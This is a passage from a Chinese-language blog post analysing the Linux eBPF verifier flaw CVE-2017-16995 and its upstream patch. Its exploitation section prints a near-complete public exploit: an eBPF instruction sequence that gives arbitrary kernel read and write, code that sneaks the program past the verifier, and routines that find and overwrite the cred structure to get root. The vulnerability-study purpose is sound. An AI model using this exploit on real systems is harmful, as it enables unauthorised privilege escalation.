    [2] err = check_mem_access(env, insn->src_reg, insn->off,
    BPF_SIZE(insn->code), BPF_READ,
    insn->dst_reg);
    if (err)
    return err;

    if (BPF_SIZE(insn->code) != BPF_W) {
    insn_idx++;
    continue;
    }

    if (insn->imm == 0) {
    /* saw a valid insn
    * dst_reg = *(u32 *)(src_reg + off)
    * use reserved 'imm' field to mark this insn
    */
    insn->imm = src_reg_type;

    } else if (src_reg_type != insn->imm &&
    (src_reg_type == PTR_TO_CTX ||
    insn->imm == PTR_TO_CTX)) {
    /* ABuser program is trying to use the same insn
    * dst_reg = *(u32*) (src_reg + off)
    * with different pointer types:
    * src_reg == ctx in one branch and
    * src_reg == stack|map in some other branch.
    * Reject it.
    */
    verbose("same insn cannot be used with different pointers\n");
    return -EINVAL;
    }

    } else if (class == BPF_STX) {
    enum bpf_reg_type dst_reg_type;

    if (BPF_MODE(insn->code) == BPF_XADD) {
    err = check_xadd(env, insn);
    if (err)
    return err;
    insn_idx++;
    continue;
    }

    /* check src1 operand */
    [1] err = check_reg_arg(regs, insn->src_reg, SRC_OP);
    if (err)
    return err;
    /* check src2 operand */
    [1] err = check_reg_arg(regs, insn->dst_reg, SRC_OP);
    if (err)
    return err;

    dst_reg_type = regs[insn->dst_reg].type;

    /* check that memory (dst_reg + off) is writeable */
    [2] err = check_mem_access(env, insn->dst_reg, insn->off,
    BPF_SIZE(insn->code), BPF_WRITE,
    insn->src_reg);
    if (err)
    return err;

    if (insn->imm == 0) {
    insn->imm = dst_reg_type;
    } else if (dst_reg_type != insn->imm &&
    (dst_reg_type == PTR_TO_CTX ||
    insn->imm == PTR_TO_CTX)) {
    verbose("same insn cannot be used with different pointers\n");
    return -EINVAL;
    }

    }
    以上情况,如果采用MOV这样的赋值指令去读写的话,寄存器类型会判定为IMM,而拒绝。另外一种是用BPF_FUNC_map_lookup_elem这样的函数调用返回,再赋给某个寄存器,然后再进行读写。而这种方法会在赋值时被设定为UNKNOWN而拒绝读写。

    bpf_prog_run

    以上就是对于加载指令的全部检查,可以看到我们能想到的内存读写方法都是会被检测出来的。真正执行的时候代码在__bpf_prog_run中,其中可以看到所谓的各个寄存器和栈只是这个函数的局部变量。
    程序维护了一个跳表,根据opcode来进行跳转,而函数中没有任何check,具体实现代码十分简单,就不赘述了。可以发现程序的寄存器变量与check中的寄存器变量不太一样,此时是unsigned long long类型。
    1
    2
    3
    4
    5
    6
    7
    8
    static unsigned int __bpf_prog_run(void *ctx, const struct bpf_insn *insn)
    {
    u64 stack[MAX_BPF_STACK / sizeof(u64)];
    u64 regs[MAX_BPF_REG], tmp;
    static const void *jumptable[256] = {
    [0 ... 255] = &&default_label,
    /* Now overwrite non-defaults ... */
    ...

    漏洞分析

    本漏洞的原因是check函数和真正的函数的执行方法不一致导致的,主要问题是二者寄存器值类型不同。先看下面一段EBPF指令:
    1
    2
    3
    4
    5
    [0]: ALU_MOV_K(0,9,0x0,0xffffffff)	/* r9 = (u32)0xFFFFFFFF */
    [1]: JMP_JNE_K(0,9,0x2,0xffffffff) /* if (r9 == -1) { */
    [2]: ALU64_MOV_K(0,0,0x0,0x0)
    [3]: JMP_EXIT(0,0,0x0,0x0) /* exit(0); */
    [4]: ......
    第0条指令是将0xffffffff放入r9寄存器中,当在do_check函数中时,在[1]处会直接将0xffffffff复制给r9,并将type赋值为IMM。在第[1]条指令,比较r9 == 0xffffffff,相等时就执行[2]、[3],否则跳到[4]。根据前文对退出的分析,这个地方在do_check看来是一个恒等式,不会将另外一条路径压入stack,直接退出。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    if (class == BPF_ALU || class == BPF_ALU64) {
    err = check_alu_op(env, insn);
    if (err)
    return err;
    }
    static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn)
    {
    struct reg_state *regs = env->cur_state.regs;
    u8 opcode = BPF_OP(insn->code);
    int err;

    if (opcode == BPF_END || opcode == BPF_NEG) {
    ... ...
    }

    /* check src operand */
    .......

    /* check dest operand */
    .......

    } else if (opcode == BPF_MOV) {

    if (BPF_SRC(insn->code) == BPF_X) {
    if (insn->imm != 0 || insn->off != 0) {
    verbose("BPF_MOV uses reserved fields\n");
    return -EINVAL;
    }

    /* check src operand */
    err = check_reg_arg(regs, insn->src_reg, SRC_OP);
    if (err)
    return err;
    } else {
    if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
    verbose("BPF_MOV uses reserved fields\n");
    return -EINVAL;
    }
    }

    /* check dest operand */
    err = check_reg_arg(regs, insn->dst_reg, DST_OP);
    if (err)
    return err;

    if (BPF_SRC(insn->code) == BPF_X) {
    if (BPF_CLASS(insn->code) == BPF_ALU64) {
    /* case: R1 = R2
    * copy register state to dest reg
    */
    regs[insn->dst_reg] = regs[insn->src_reg];
    } else {
    if (is_pointer_value(env, insn->src_reg)) {
    verbose("R%d partial copy of pointer\n",
    insn->src_reg);
    return -EACCES;
    }
    regs[insn->dst_reg].type = UNKNOWN_VALUE;
    regs[insn->dst_reg].map_ptr = NULL;
    }
    [1] } else {
    /* case: R = imm
    * remember the value we stored into this reg
    */
    regs[insn->dst_reg].type = CONST_IMM;
    regs[insn->dst_reg].imm = insn->imm;
    }

    } else if (opcode > BPF_END) {
    verbose("invalid BPF_ALU opcode %x\n", opcode);
    return -EINVAL;

    } else { /* all other ALU ops: and, sub, xor, add, ... */
    ......
    }

    return 0;
    }
    而在真实执行的过程中,由于寄存器类型不一样,在执行第二条跳转语句时存在问题:
    1
    2
    3
    4
    5
    6
    JMP_JNE_K:
    if (DST != IMM) {
    insn += insn->off;
    CONT_JMP;
    }
    CONT;
    可以看到汇编指令被翻译成movsxd,而此时会发生符号扩展,由原来的0xffffffff扩展成0xffffffffffffffff,再次比较的时候二者并不相同,造成了跳转到[4]处执行,从而绕过了对[4]以后EBPF程序的校验。
    image.png

漏洞利用

当[4]以后的程序不经过check以后,就可以对[4]的内容进行构造了,利用真正执行时无类型就可以达到内存任意读写了。使用exploit-db上的exp,编译完运行即可提权。
下面来分析exp的提权原理。eBPF程序逻辑如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
[0]: ALU_MOV_K(BPF_REG_9, BPF_REG_0, 0x0, 0xffffffff)	//r9 = -1
[1]: JMP_JNE_K(BPF_REG_9, BPF_REG_0, 0x2, 0xffffffff) //if(r9 == -1){
[2]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //r0 = 0
[3]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[4]: LD_MAP_FD(BPF_REG_9, map_addr) //r9 = mapfd
[5]: bpf_map_padding
----------------------------------------------------------------------------
[6]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0) //r1 = r9
[7]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10(rbp)
[8]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc) //r2 = r2-4
[9]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x0) //[rbp-4] = 0
[10]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0,
BPF_FUNC_map_lookup_elem)//执行BPF_FUNC_map_lookup_elem
[11]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 == 0){
[12]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit
[13]: LDX_MEM_DW(BPF_REG_6, BPF_REG_0, 0x0, 0x0) //r6 = [r0] = map[0]
----------------------------------------------------------------------------
[14]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0) //r1 = r9
[15]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //r2 = r10
[16]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)//r2 = r2 - 4
[17]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x1) //[rbp-4] = 1
[18]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0,
BPF_FUNC_map_lookup_elem)
[19]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0) //if(r0 == 0){
[20]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit(0)
[21]: LDX_MEM_DW(BPF_REG_7, BPF_REG_0, 0x0, 0x0) //r7 = [r0] = map[1]
----------------------------------------------------------------------------
[22]: ALU64_MOV_X(BPF_REG_1, BPF_REG_9, 0x0, 0x0)
[23]: ALU64_MOV_X(BPF_REG_2, BPF_REG_10, 0x0, 0x0)
[24]: ALU64_ADD_K(BPF_REG_2, BPF_REG_0, 0x0, 0xfffffffc)
[25]: ST_MEM_W(BPF_REG_10, BPF_REG_0, 0xfffc, 0x2)
[26]: BPF_RAW_INSN(BPF_JMP | BPF_CALL, BPF_REG_0, BPF_REG_0, 0,
BPF_FUNC_map_lookup_elem)
[27]: JMP_JNE_K(BPF_REG_0, BPF_REG_0, 0x1, 0x0)
[28]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)
[29]: LDX_MEM_DW(BPF_REG_8, BPF_REG_0, 0x0, 0x0) //r8 = [r0] = map[2]
----------------------------------------------------------------------------
[30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0)//r2=r0
[31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//r0=0
[32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0)// if r6 != 0 jmp 36
[33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0)//r3=[r7]
[34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0)//[r2]=r3
[35]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit
[36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1)//if r6 !=1 1 jmp 39
[37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0)//[r2]=r10=rbp
[38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit
[39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0)//[r7]=r8
[40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0)//exit

下面对这个程序进行分析:
首先,[0][3]已经分析过了下面对后续指令进行分析:
第[4]
[5]条语句可用由上面的map知识得到,第五条语句是填充语句,当执行完后,会将map的地址存放在r9寄存器中。
[6]~[13]语句的类C代码如下,即调用BPF_FUNC_map_lookup_elem(map_add, idx),并将返回值存到r6寄存器中,即 r6 = map[0]

1
2
3
4
5
6
7
8
[6]: r1 = r9
[7]: r2 = rbp
[8]: r2 = r2-4
[9]: [rbp+(-4)] = 0 (idx)
[10]: call BPF_FUNC_map_lookup_elem
[11]: if r0 == 0:
[12]: exit(0)
[13]: r6 = [r0]

[14][21]同理,将 r7 = map[1]。[22][29]为 r8 = map[2],而map的内容可以由用户态传入。
最后[30]~[40]分为三个部分

  1. map[0]为0:r3 = map[1]地址所指的内容, map[2] = r3,由于map1值可控,我们通过此指令组合实现任意地址泄露

  2. map[0]为1:将rbp存储到map[2]中,泄露内核栈基址

  3. map[0]为2:将map[2]的值写入到map[1]的地址上去,我们通过此指令组合实现任意地址写。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    // r6 == map[0]		r7 == map[1]	r8 == map[2]
    [30]: ALU64_MOV_X(BPF_REG_2, BPF_REG_0, 0x0, 0x0) //r2 = r0 = map[2]
    [31]: ALU64_MOV_K(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //r0 = 0
    [32]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x3, 0x0) //if(r6 != 0) jmp 36
    [33]: LDX_MEM_DW(BPF_REG_3, BPF_REG_7, 0x0, 0x0) //r3 = [r7]
    [34]: STX_MEM_DW(BPF_REG_2, BPF_REG_3, 0x0, 0x0) //[r2] = r3
    [35]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit
    [36]: JMP_JNE_K(BPF_REG_6, BPF_REG_0, 0x2, 0x1) //if(r6 != 1) jmp 39
    [37]: STX_MEM_DW(BPF_REG_2, BPF_REG_10, 0x0, 0x0) //[r2] = r10 = rbp
    [38]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit
    [39]: STX_MEM_DW(BPF_REG_7, BPF_REG_8, 0x0, 0x0) //[r7] = r8
    [40]: JMP_EXIT(BPF_REG_0, BPF_REG_0, 0x0, 0x0) //exit
  4. 创建map,加载eBPF指令,绑定到socket

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    void  initialize() {
    ...
    mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3, 0);
    if (mapfd < 0) {
    fail("failed to create bpf map: '%s'\n", strerror(errno));
    }

    redact("sneaking evil bpf past the verifier\n");
    progfd = load_prog();
    if (progfd < 0) {
    if (errno == EACCES) {
    msg("log:\n%s", bpf_log_buf);
    }
    fail("failed to load prog '%s'\n", strerror(errno));
    }

    redact("creating socketpair()\n");
    if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
    fail("failed to create socket pair '%s'\n", strerror(errno));
    }

    redact("attaching bpf backdoor to socket\n");
    if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
    fail("setsockopt '%s'\n", strerror(errno));
    }
    }
  5. 寻找cred结构体,这里的exp寻找不是基于thread_info结构体中的task_struct,而是通过泄露socket地址从另一个结构体变量中找到cred。在经典版本中,用的是泄露内核栈地址addr,然后用addr & ~(0x400-1)来找thread_info进而找cred。这个原理是内核栈和thread_info位置相邻,地址有对应关系。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    static unsigned long find_cred() {
    uid_t uid = getuid();
    unsigned long skbuff = get_skbuff();
    /*
    * struct sk_buff {
    * [...24 byte offset...]
    * struct sock *sk;
    * };
    *
    */

    unsigned long sock_addr = read64(skbuff + 24);
    msg("skbuff => %llx\n", skbuff);
    msg("Leaking sock struct from %llx\n", sock_addr);
    if(sock_addr < PHYS_OFFSET){
    fail("Failed to find Sock address from sk_buff.\n");
    }

    /*
    * scan forward for expected sk_rcvtimeo value.
    *
    * struct sock {
    * [...]
    * const struct cred *sk_peer_cred;
    * long sk_rcvtimeo;
    * };
    */
    for (int i = 0; i < 100; i++, sock_addr += 8) {
    if(read64(sock_addr) == 0x7FFFFFFFFFFFFFFF) {
    unsigned long cred_struct = read64(sock_addr - 8);
    if(cred_struct < PHYS_OFFSET) {
    continue;
    }

    unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF);

    if(test_uid != uid) {
    continue;
    }
    msg("Sock->sk_rcvtimeo at offset %d\n", i * 8);
    msg("Cred structure at %llx\n", cred_struct);
    msg("UID from cred structure: %d, matches the current: %d\n", test_uid, uid);

    return cred_struct;
    }
    }
    fail("failed to find sk_rcvtimeo.\n");
    }
  6. 使用任意地址写功能将cred的uid改为0,起root shell。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    static void hammer_cred(unsigned long addr) {
    msg("hammering cred structure at %llx\n", addr);
    #define w64(w) { write64(addr, (w)); addr += 8; }
    unsigned long val = read64(addr) & 0xFFFFFFFFUL;
    w64(val);
    w64(0); w64(0); w64(0); w64(0);
    w64(0xFFFFFFFFFFFFFFFF);
    w64(0xFFFFFFFFFFFFFFFF);
    w64(0xFFFFFFFFFFFFFFFF);
    #undef w64
    }

    image.png

image.png
至此漏洞分析结束

漏洞patch

漏洞的patch如下kernel/git/torvalds/linux.git
这里在do_check里添加了对于BPF_ALU64指令的判断,从而将64和32的比较区分开来,使得预先check和实际run code的检查环境一致,该漏洞无法再被利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 625e358ca765e..c086010ae51ed 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -2408,7 +2408,13 @@ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn)
* remember the value we stored into this reg
*/
regs[insn->dst_reg].type = SCALAR_VALUE;
- __mark_reg_known(regs + insn->dst_reg, insn->imm);
+ if (BPF_CLASS(insn->code) == BPF_ALU64) {
+ __mark_reg_known(regs + insn->dst_reg,
+ insn->imm);
+ } else {
+ __mark_reg_known(regs + insn->dst_reg,
+ (u32)insn->imm);
+ }
}

} else if (opcode > BPF_END) {

参考文献

http://p4nda.top/2019/01/18/CVE-2017-16995

https://v1ckydxp.github.io/2019/09/02/2019-09-02-cve-2017-16995%20%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

https://xz.aliyun.com/t/7782

https://xz.aliyun.com/t/2212


本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!